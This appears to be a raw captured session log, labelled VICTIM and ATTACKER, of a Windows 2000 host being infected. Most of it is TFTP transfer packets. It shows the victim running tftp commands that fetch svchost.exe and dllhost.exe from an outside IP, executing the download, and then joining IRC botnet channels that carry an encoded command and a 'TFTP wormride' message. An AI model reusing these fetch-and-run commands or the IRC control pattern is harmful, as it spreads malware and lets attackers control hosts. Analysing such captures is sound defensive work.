VICTIM: Microsoft Windows 2000 [Version 5.00.2195]
VICTIM: (C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32>
VICTIM: tftp -i 118.87.20.81 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: \000\004\000;
VICTIM: \000\004\000<
VICTIM: \000\004\000=
VICTIM: \000\004\000>
VICTIM: \000\004\000?
VICTIM: \000\004\000@
VICTIM: \000\004\000A
VICTIM: \000\004\000B
VICTIM: \000\004\000C
VICTIM: \000\004\000D
VICTIM: \000\004\000E
VICTIM: \000\004\000F
VICTIM: \000\004\000G
VICTIM: \000\004\000H
VICTIM: \000\004\000I
VICTIM: \000\004\000J
VICTIM: \000\004\000K
VICTIM: \000\004\000L
VICTIM: \000\004\000M
VICTIM: \000\004\000N
VICTIM: \000\004\000O
VICTIM: \000\004\000P
VICTIM: \000\004\000Q
VICTIM: \000\004\000R
VICTIM: \000\004\000S
VICTIM: \000\004\000T
VICTIM: \000\004\000U
VICTIM: \000\004\000V
VICTIM: \000\004\000W
VICTIM: \000\004\000X
VICTIM: \000\004\000Y
VICTIM: \000\004\000Z
VICTIM: \000\004\000[
VICTIM: \000\004\000\\
VICTIM: \000\004\000]
VICTIM: \000\004\000^
VICTIM: \000\004\000_
VICTIM: \000\004\000`
VICTIM: \000\004\000a
VICTIM: \000\004\000b
VICTIM: \000\004\000c
VICTIM: \000\004\000d
VICTIM: \000\004\000e
VICTIM: \000\004\000f
VICTIM: \000\004\000g
VICTIM: \000\004\000h
VICTIM: \000\004\000i
VICTIM: \000\004\000j
VICTIM: \000\004\000k
VICTIM: \000\004\000l
VICTIM: \000\004\000m
VICTIM: \000\004\000n
VICTIM: \000\004\000o
VICTIM: \000\004\000p
VICTIM: \000\004\000q
VICTIM: \000\004\000r
VICTIM: \000\004\000s
VICTIM: \000\004\000t
VICTIM: \000\004\000u
VICTIM: \000\004\000v
VICTIM: \000\004\000w
VICTIM: \000\004\000x
VICTIM: \000\004\000y
VICTIM: \000\004\000z
VICTIM: \000\004\000{
VICTIM: \000\004\000|
VICTIM: \000\004\000}
VICTIM: \000\004\000~
VICTIM: \000\004\000\177
VICTIM: \000\004\000\200
VICTIM: \000\004\000\201
VICTIM: \000\004\000\202
VICTIM: \000\004\000\203
VICTIM: \000\004\000\204
VICTIM: \000\004\000\205
VICTIM: \000\004\000\206
VICTIM: \000\004\000\207
VICTIM: \000\004\000\210
VICTIM: \000\004\000\211
VICTIM: \000\004\000\212
VICTIM: \000\004\000\213
VICTIM: \000\004\000\214
VICTIM: \000\004\000\215
VICTIM: \000\004\000\216
VICTIM: \000\004\000\217
VICTIM: \000\004\000\220
VICTIM: \000\004\000\221
VICTIM: \000\004\000\222
VICTIM: \000\004\000\223
VICTIM: \000\004\000\224
VICTIM: \000\004\000\225
VICTIM: \000\004\000\226
VICTIM: \000\004\000\227
VICTIM: \000\004\000\230
VICTIM: \000\004\000\231
VICTIM: \000\004\000\232
VICTIM: \000\004\000\233
VICTIM: \000\004\000\234
VICTIM: \000\004\000\235
VICTIM: \000\004\000\236
VICTIM: Transfer successful: 80384 bytes in 23 seconds, 3494 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: tftp -i 118.87.20.81 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: \000\004\000;
VICTIM: \000\004\000<
VICTIM: \000\004\000=
VICTIM: \000\004\000>
VICTIM: \000\004\000?
VICTIM: \000\004\000@
VICTIM: \000\004\000A
VICTIM: \000\004\000B
VICTIM: \000\004\000C
VICTIM: \000\004\000D
VICTIM: \000\004\000E
VICTIM: \000\004\000F
VICTIM: \000\004\000G
VICTIM: \000\004\000H
VICTIM: \000\004\000I
VICTIM: \000\004\000J
VICTIM: \000\004\000K
VICTIM: \000\004\000L
VICTIM: \000\004\000M
VICTIM: \000\004\000N
VICTIM: \000\004\000O
VICTIM: \000\004\000P
VICTIM: \000\004\000Q
VICTIM: \000\004\000R
VICTIM: \000\004\000S
VICTIM: \000\004\000T
VICTIM: \000\004\000U
VICTIM: \000\004\000V
VICTIM: \000\004\000W
VICTIM: \000\004\000X
VICTIM: \000\004\000Y
VICTIM: \000\004\000Z
VICTIM: \000\004\000[
VICTIM: \000\004\000\\
VICTIM: \000\004\000]
VICTIM: \000\004\000^
VICTIM: \000\004\000_
VICTIM: \000\004\000`
VICTIM: \000\004\000a
VICTIM: \000\004\000b
VICTIM: \000\004\000c
VICTIM: \000\004\000d
VICTIM: \000\004\000e
VICTIM: \000\004\000f
VICTIM: \000\004\000g
VICTIM: \000\004\000h
VICTIM: \000\004\000i
VICTIM: \000\004\000j
VICTIM: \000\004\000k
VICTIM: \000\004\000l
VICTIM: \000\004\000m
VICTIM: \000\004\000n
VICTIM: \000\004\000o
VICTIM: \000\004\000p
VICTIM: \000\004\000q
VICTIM: \000\004\000r
VICTIM: \000\004\000s
VICTIM: \000\004\000t
VICTIM: \000\004\000u
VICTIM: \000\004\000v
VICTIM: \000\004\000w
VICTIM: \000\004\000x
VICTIM: \000\004\000y
VICTIM: \000\004\000z
VICTIM: \000\004\000{
VICTIM: \000\004\000|
VICTIM: \000\004\000}
VICTIM: \000\004\000~
VICTIM: \000\004\000\177
VICTIM: \000\004\000\200
VICTIM: \000\004\000\201
VICTIM: \000\004\000\202
VICTIM: \000\004\000\203
VICTIM: \000\004\000\204
VICTIM: \000\004\000\205
VICTIM: \000\004\000\206
VICTIM: \000\004\000\207
VICTIM: \000\004\000\210
VICTIM: \000\004\000\211
VICTIM: \000\004\000\212
VICTIM: \000\004\000\213
VICTIM: \000\004\000\214
VICTIM: \000\004\000\214
VICTIM: \000\004\000\215
VICTIM: \000\004\000\216
VICTIM: \000\004\000\217
VICTIM: \000\004\000\220
VICTIM: \000\004\000\221
VICTIM: \000\004\000\222
VICTIM: \000\004\000\223
VICTIM: \000\004\000\224
VICTIM: \000\004\000\225
VICTIM: \000\004\000\226
VICTIM: \000\004\000\227
VICTIM: \000\004\000\230
VICTIM: \000\004\000\231
VICTIM: \000\004\000\232
VICTIM: \000\004\000\233
VICTIM: \000\004\000\234
VICTIM: \000\004\000\235
VICTIM: \000\004\000\236
VICTIM: Transfer successful: 80384 bytes in 25 seconds, 3215 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: C:\\WINNT\\system32>
VICTIM: USER gxizzv gxizzv gxizzv :nsutetrhqmufpekc
VICTIM: NICK rGWPLhPR
ATTACKER: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :*** Checking IdentNOTICE AUTH :*** No Ident response
ATTACKER: :norks.org 001 rGWPLhPR :Welcome to the Internet Relay Network rGWPLhPR:norks.org 002 rGWPLhPR :Your host is localhost, running version 2.9/hybrid-6.3NOTICE rGWPLhPR :*** Your host is localhost, running version 2.9/hybrid-6.3:norks.org 003 rGWPLhPR :This server was created Thu Dec 6 2001 at 11:52:49 GMT:norks.org 004 rGWPLhPR norks.org 2.8/hybrid-6.2 oOiwszcrkfydnxb biklmnopstve:norks.org 251 rGWPLhPR :There are 2 users and 0 invisible on 1 servers:norks.org 255 rGWPLhPR :I have 2 clients and 0 servers:norks.org 265 rGWPLhPR :Current local users: 2 Max: 2:norks.org 266 rGWPLhPR :Current global users: 2 Max: 2:norks.org 250 rGWPLhPR :Highest connection count: 2 (2 clients) (2 since server was (re)started):norks.org 375 rGWPLhPR :- norks.org Message of the Day -:norks.org 372 rGWPLhPR :- Where's the kaboom? There was supposed to be an earth shattering kaboom.:norks.org 376 rGWPLhPR :End of /MOTD command.
VICTIM: MODE rGWPLhPR +xi
VICTIM: JOIN #last USERHOST rGWPLhPR
ATTACKER: :rGWPLhPR!gxizzv@192.168.1.182 JOIN :#last
VICTIM: MODE #last +smntu
ATTACKER: :norks.org MODE #last +nt:norks.org 353 rGWPLhPR = #last :@wloos rGWPLhPR:norks.org 366 rGWPLhPR #last :End of /NAMES list.:norks.org 332 rGWPLhPR #last ::norks.org 333 rGWPLhPR #last rGWPLhPR 1251838846:wloos!~wloos@norks.org PRIVMSG #last :
ATTACKER: :norks.org 324 rGWPLhPR #last +smntu +tn:norks.org 329 rGWPLhPR #last +smntu 1251838846
VICTIM: USER gxizzv gxizzv gxizzv :nsutetrhqmufpekc
ATTACKER: NICK rGWPLhPR
ATTACKER: :hub.20582.com 001 rGWPLhPR :eduzz, rGWPLhPR!gxizzv@192.168.1.182:hub.20582.com 005 rGWPLhPR MAP KNOCK SAFELIST HCN MAXCHANNELS=80 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server:hub.20582.com 005 rGWPLhPR WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=eduzz CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server:rGWPLhPR MODE rGWPLhPR :+iRp:rGWPLhPR!gxizzv@192.168.1.182 JOIN :#m:hub.20582.com 332 rGWPLhPR #m :=MIDfOh3VBIUm3mTH527LDMu+p9TpFz6iwDmtgMf9QIz3IJ4j3dVWgm3s18S7KGE4i6ugfOnZfW9KpiNPvvyb8f8p5/ONCi6cN0vmh3xt47jIPeoUfwjFqHk86INwp99KpB0gJFtfH5liGlPBVtylu7X/mZPz3gL0zdXujQTPncg4F1l2UygfQLgJYL/nABJ:hub.20582.com 333 rGWPLhPR #m tcrqtvgpohc 1250870846:hub.20582.com 353 rGWPLhPR @ #m :rGWPLhPR :hub.20582.com 366 rGWPLhPR #m :End of /NAMES list.
VICTIM: MODE rGWPLhPR +xi
VICTIM: JOIN #last USERHOST rGWPLhPRMODE #m +smntuPRIVMSG #m :-\00304\0022\003\002- Running TFTP wormride thread
ATTACKER: :rGWPLhPR!gxizzv@192.168.1.182 JOIN :#last:hub.20582.com 353 rGWPLhPR @ #last :rGWPLhPR :hub.20582.com 366 rGWPLhPR #last :End of /NAMES list.:hub.20582.com 302 rGWPLhPR :rGWPLhPR=+gxizzv@192.168.1.182 :hub.20582.com 482 rGWPLhPR #m :You're not channel operator:hub.20582.com 404 rGWPLhPR #m :You must have a registered nick (+r) to talk on this channel (#m)
VICTIM: MODE #last +smntu
ATTACKER: :hub.20582.com 482 rGWPLhPR #last :You're not channel operator